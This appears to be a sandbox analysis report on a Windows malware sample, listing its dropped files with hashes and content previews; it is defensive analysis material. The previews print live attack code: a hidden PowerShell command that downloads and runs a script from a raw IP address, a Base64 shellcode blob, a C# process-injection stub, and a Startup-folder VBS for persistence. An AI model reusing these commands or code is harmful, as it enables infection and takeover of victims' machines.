Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.k.a.x.w.g.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.k.a.x.w.g.f.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat

Download File

Process:	C:\Users\user\Desktop\yjYJ8QncaF.exe
File Type:	ASCII text, with very long lines (304), with CRLF line terminators
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.334205760568907
Encrypted:	false
SSDEEP:	6:NS0SG80QO0c5I1R3KuYkeAILh8JJwgJBG0w5z4VOXL8UdMR+u1MFCsnfSTFUqO0J:NS5G80Qpc5I1kxAKG3wgJ80w588Xxdxe
MD5:	3895CB9413357F87A88C047AE0D0BD40
SHA1:	227404DD0F7D7D3EA9601EECD705EFFE052A6C91
SHA-256:	8140DF06EBCDA4D8B85BB00C3C0910EFC14B75E53E7A1E4F7B6FA515E4164785
SHA-512:	A886081127B4888279ABA9B86AA50A74D044489CF43819C1DEA793A410E39A62413CEB7866F387407327B348341B2FF03CBE2430C57628A5E5402447D3070CA1
Malicious:	true
Preview:	@shift /0..@echo off..powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile '%TEMP%\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"%TEMP%\installer.ps1\"' -WindowStyle Hidden}"..exit..

C:\Users\user\AppData\Local\Temp\RES4748.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Mar 6 08:29:39 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1332
Entropy (8bit):	3.9960326090889637
Encrypted:	false
SSDEEP:	24:HDFzW98hfotDfHgwKEsmNwI+ycuZhNtakSLPNnqS2d:1GvKhmm1ulta3hqSG
MD5:	605AAFD47BB2A46B8701A6E0F675B396
SHA1:	80B5FD708B7E8EB5B1EB8E92DFB78A32D445E0EC
SHA-256:	452005A561540826DE85C9BCF925D98C99FF7D302E500E242CCF02AED1BB8CA1
SHA-512:	D703914377AE003759BBCB8787F34CAC15F09EF64395B2D119DAA2D1560B925234ABCA43B2A2E9EDD432D6FD91A9CA2B684BD8E4A5564AC3165AC206543C92EA
Malicious:	false
Preview:	L....\.g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........R....c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP...................-...).TW:..IY..........4.......C:\Users\user\AppData\Local\Temp\RES4748.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.5.a.x.k.i.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

C:\Users\user\AppData\Local\Temp\RESC2E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Thu Mar 6 08:30:29 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1376
Entropy (8bit):	4.074587054061173
Encrypted:	false
SSDEEP:	24:HOO9DhfHWfHvwKMbmuVMONWI+ycuZhNQakS8PNnqSQEgd:TZHKYKMCu941ulQa3sqSZ0
MD5:	E5BFE79EB397A791D711C7DF694E29D9
SHA1:	0219CE6B3458E2BD95F4BD40B90368057560F932
SHA-256:	6930185BBD1D28758641467171893CBF9D0E22040427427CB5983FBFF75B52D2
SHA-512:	EE516EB5DD7FC0F4BBA73E49EBDF1B144A28725CA235D960362BEE4B70683A4176E0B104BD4774B6E86EEF045BAD427DF7D6C4AFB05E758E33F36F5D45A91836
Malicious:	false
Preview:	L...%].g.............debug$S........\|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........J....c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP.................t%=.BJ.O.%.....O..........3.......C:\Users\user\AppData\Local\Temp\RESC2E.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.k.a.x.w.g.f.0...d.l.l.....(.....L.e.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqbmsprm.bca.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oabdcs20.0dj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlxlywox.ppj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x35oyid4.4l4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yiaipqer.mnp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdfydncl.rh1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\installer.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	11903058
Entropy (8bit):	6.001286550602484
Encrypted:	false
SSDEEP:	49152:ouEYV56Cuy/XQxTwsUcCnFapQCYTF7j1D2Srat2EO9MsskNirT2sh7Wv0yCLfcvh:r
MD5:	B6D611AF4BEA8EAAA639BBF024EB0E2D
SHA1:	0B1205546FD80407D85C9BFBED5FF69D00645744
SHA-256:	8CD3BF95CEDCF3469D0044976C66CBF22CD2FECF21AE4F94986D7211D6BA9A2B
SHA-512:	D8A4EC5BD986884959DB3EDFD48E2BF4C70EAD436F81EAB73B104AA0FF0F5DADFB6227CB2DAB1F979F0DBB3AAFBC1889ED571FB6E9444A09AE984B789314463D
Malicious:	true
Preview:	$Base64Shellcode = "6MD1hwDA9YcAMPEXpBBNkUDFfYRVQ3yvInI8M4ntArL8Wl9/MsdctFgAAAAA1kkIlrOpS+cPj2a2EVOQ05KNTYfQ4AZSALPZO0MFCDzNkh+QQPV7z+9gp/qtd66s8jhY0dN5HFsabYXl2lg1REifKK1HETr37UZTWesfJVAVfXlbEG1v5HpNvQ0JrANX7uoPeD6UvxsrKFTOLLOBcwmp+jMqSjOCc+Ffoy9S5upBheclDaAoW9B95yX35U/Od7YFyDOf45PGumgNadzuIdAiJ3VtcMM+pKc06MyHqDc0vw5WryQbnoDapNfe8vSW1hFDmnA0Ifbz2MozCzG4WVcNRBl1Zu8NNpUTMjHE6DqO8OhB8vbEmjR5j9iSw1JE0+VGDd3gbaPMMZ/2/BEvE7PSVB2Egc15AzGIRO1ycscdHgc53oIqCierNft0tge6jHxIznGqwS6tN1jIyGRlNS1DKsqwDkBdjUmIlWvEVSZHNQ2wTuzURXYPh5Oiqayot+XSITp+rMQgbjyufsBzFAgqAEZwt+rEUtZcvN8fvLNyUGn7npCzGEQyE9d1VKttlHE6r3I9qyvI50jaee64LDR2mOUVjn9b77vlNyOcoVGLPSFJWRdZ+UN9/0Na3Esn5vzzdTQPSVxbWVC7zVfyFVTwTZwo1vay4lZVBgs3jdG5lHobkzevh6+zYyf5luHi8mK+oBiSr/sv/N4sPO8PJCWvfCpIA2fh/Jv2SRW9754AAAAAAAAAAAEAAAADAAAAAAAAABkRvFSmEhLro5cn+JFulhQts0r6aEDUmLx8PvVGAEo4oH+0z/3YqZPt2EoeCJxNTnYYhpoznR2YcS19oj8NaFjXdIT/izGoglFFvN7LkUep2ocDSHaeyffSr83KrIWM0F+cBz5yQFNZI7ApliUsRw2Mr2gXmhg+dy/EHPEHzmS5q4YtRVNiBwpiEu1p0jPIAK0pNzzYp3vTBZhOwIQA

C:\Users\user\AppData\Local\Temp\tkaxwgf0.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	941
Entropy (8bit):	4.911556815123455
Encrypted:	false
SSDEEP:	24:JjmRMtfg4uI5mnFz7sV+HyfwztLqtsmPz9y:Jjjtfg4uI5IFz7sUHyfitmb7E
MD5:	1809FE3BA081F587330273428EC09C9C
SHA1:	D24EA2EA868AE49F46C8A7D894B7FDA255EC1CD9
SHA-256:	D07A0C5FDF0862325608791F92273E0FC411C294F94D757F1FF0303BA5E03457
SHA-512:	E662420FC93A5CEFD657F7701432924E6A06482EA147AD814D5E20B16B2F3C13ED2CC6B9CAF24C22B7A5B24AD0AA1D216C5804C46D2250522CFC2CADC69F9E28
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace Win32.{. public class Kernel32. {. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);.. }..}.

C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.259303947937374
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fSzxs7+AEszIwkn23fX:p37Lvkmb6KRfKWZEifv
MD5:	C47CDA9A9DE95A82F633782D888FD0AA
SHA1:	942FE9834AA91DE53A6183CFC18CE53827E4A53E
SHA-256:	578755C50880C978F9B17E132B65B5D16A5191681123F6F359247DEDC725DE9C
SHA-512:	3E8869E1EAC6C1BA0CFA64CF4945F84DAD7D607F443CD50D385781DEEA7EF382003CCE4FEE38CD3172842AB3D3D349F4C8F059E22C060AFF96C69E96F6315797
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkaxwgf0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tkaxwgf0.0.cs"

C:\Users\user\AppData\Local\Temp\tkaxwgf0.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.1937697605866555
Encrypted:	false
SSDEEP:	48:6RKMkdjUITNfiXsjom8guz7NcJ+72Q/1ulQa3sq6:kkdjVruKk
MD5:	7E17130868E44DD3503F9677F8A88842
SHA1:	18FAF9D7FD1EF0E96D14E6A915B9FCE69FDAAC7A
SHA-256:	22B2265CA88909D859A07DD67BCD8B54D3E73536BCFDFA05BD71BC6AA275B59A
SHA-512:	E32F4DBE20AF70769FCE1C249B061A5AA0A1D900934CF2FF742148FFC9E0A7B647B462038ACD423ADB31EE242EE33884259FFD263921464D9D3A3F51202B1D9A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%].g...........!................~%... ...@....... ....................................@.................................$%..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`%......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..,... ...#Strings....L.......#US.T.......#GUID...d...h...#Blob...........G.........%3............................................................6./...7......................................... .............. =............ I............ X............ k.%...P ......~.0.........................................................................................

C:\Users\user\AppData\Local\Temp\tkaxwgf0.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (484), with CRLF, CR line terminators
Category:	modified
Size (bytes):	905
Entropy (8bit):	5.305161197266265
Encrypted:	false
SSDEEP:	24:KJmuVMyId3ka6KRfrEifWKax5DqBVKVrdFAMBJTH:vuRkka6CrEuWK2DcVKdBJj
MD5:	8CDCA29A67B5058D12D8274DFC27A322
SHA1:	94DB8338893632F2AEFAAA667FCB51A48F5FA09C
SHA-256:	6F7EF80727192744C247CEF9C1851095CA8D7FBECC7F4D9E287A58108943A4E1
SHA-512:	8780356C8002F6CD96CA58536754E6A83863EB7DC12E8E8F6BD1C14F377C39796B1823627F58A7E7BC23F5BAC0452665DB7A312A5F73D47C8C43D9654E3F7FB1
Malicious:	false
Preview:	.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkaxwgf0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tkaxwgf0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.116280656576703
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/ak7YnqqLPN5Dlq5J:+RI+ycuZhNtakSLPNnqX
MD5:	029F2DA9DFCC29DB9054573AB2AF4959
SHA1:	07A8682C0BCE0BD4324E0CB63D5BBA3BF3A97ACB
SHA-256:	0947ED505A6D9CCC30F747C7154FD6F5DB1F1340CCB64DBE01A40502B3B85025
SHA-512:	00E11FF596C6BFCAD4FDFD64365C4AE2A14A28CC36895D2E2E73FC05727E319DEF4418EAA07A0F1D5A82D99CABE05C7AC9A7C0C9C1A1ED41828EDCA50FB10CBC
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.5.a.x.k.i.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.h.5.a.x.k.i.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	941
Entropy (8bit):	4.911556815123455
Encrypted:	false
SSDEEP:	24:JjmRMtfg4uI5mnFz7sV+HyfwztLqtsmPz9y:Jjjtfg4uI5IFz7sUHyfitmb7E
MD5:	1809FE3BA081F587330273428EC09C9C
SHA1:	D24EA2EA868AE49F46C8A7D894B7FDA255EC1CD9
SHA-256:	D07A0C5FDF0862325608791F92273E0FC411C294F94D757F1FF0303BA5E03457
SHA-512:	E662420FC93A5CEFD657F7701432924E6A06482EA147AD814D5E20B16B2F3C13ED2CC6B9CAF24C22B7A5B24AD0AA1D216C5804C46D2250522CFC2CADC69F9E28
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace Win32.{. public class Kernel32. {. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);.. }..}.

C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.308231512448549
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fxG5fNGqzxs7+AEszIwkn23fxG5fNGP:p37Lvkmb6KRfpG5lGqWZEifpG5lGh9
MD5:	5B0517004490494D2AB3C32C4ED2F7E2
SHA1:	74336F0E4FDA0221FD0E3FDE1866BE1745FF4A4A
SHA-256:	8DDB6A55CA6B9577AB3D7ACE2F3F3128ED526C32BD924CC29113894F9C52CC0B
SHA-512:	3305A7E8149D4382B3B4B420B7DB9428BEE82B5F5101D26C0F924FFE5904AE8B1547C656FEA2C87E99A8628338D928DEEDEA436A45A4FB731D5E80F36815D219
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.0.cs"

C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.1945168066925542
Encrypted:	false
SSDEEP:	48:6+KMkdjUITNfiXsjbm8guz7NcJJ7C/1ulta3hq6:3kdjVsvKb
MD5:	9BBC4579F21EB6AE3930E5AB9B312A91
SHA1:	C97554466BF5E7743CF3EADC953EEB49041751CC
SHA-256:	EC92F5824C7E693E9B461A484BC040F02A4930B88DBB52D360EEB3D9D518E67C
SHA-512:	A63F54BD31740F9330D56C43E73C1EEF2AC427FD4E1B250279F4E11F9C1BEAE87458634671CBB918E8C7F3F076A3F38C9A4F7C076A236A5D0DFCCBE917B43698
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.g...........!................~%... ...@....... ....................................@.................................$%..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`%......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..,... ...#Strings....L.......#US.T.......#GUID...d...h...#Blob...........G.........%3............................................................6./...7......................................... .............. =............ I............ X............ k.%...P ......~.0.........................................................................................

C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
Category:	modified
Size (bytes):	869
Entropy (8bit):	5.335919137132851
Encrypted:	false
SSDEEP:	24:KJBId3ka6KRfoCLEifoCh4Kax5DqBVKVrdFAMBJTH:Ckka6CHEuKK2DcVKdBJj
MD5:	5056A0B1A9F3BFC4DEEA8EA82F138D21
SHA1:	4F329DC5FB2244DD5541D41940BB7D8F4A550E23
SHA-256:	E81D648340FAE89466DF5710FA3974E241AFD5684A9F2A9A1E4421BC52EFEB50
SHA-512:	5E0D35D4C72821169305FF7381C36FFF1AC4CEFCEA2E7227E7BBC8C9C9E1117E1C8E2AD618B7D491B2BEAA6D8B38F6CCA2DA76219CD93327A97597A8F2DB61F3
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.129050297455779
Encrypted:	false
SSDEEP:	3:j+qAHmFEm8nhcDQANX4E4RwOt+kiEaKC5SufyM1KXERASD8NXNWIjI:j+q9Nqh6XewknaZ5SuH1r4Nd5I
MD5:	590AD46C359C9CFEB5D3124E5C158E6B
SHA1:	B1A07AECEA93E96ADB84DCCC9B1179AB801C11EA
SHA-256:	A7DA956264ED0EB050700E1020EEC18B76B1268BF399C8632E61C4528FDBFB42
SHA-512:	94BE171BBE094C663CF7361CAC4544FA1018EB047D240D9F39F82593D71481C581BF57BC723067C7A046178777230A8E39486FE058ED1E58F37BE9DF0E05AB6E
Malicious:	true
Preview:	Set objShell = CreateObject("WScript.Shell")..objShell.Run chr(34) & "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" & chr(34), 0, False

C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
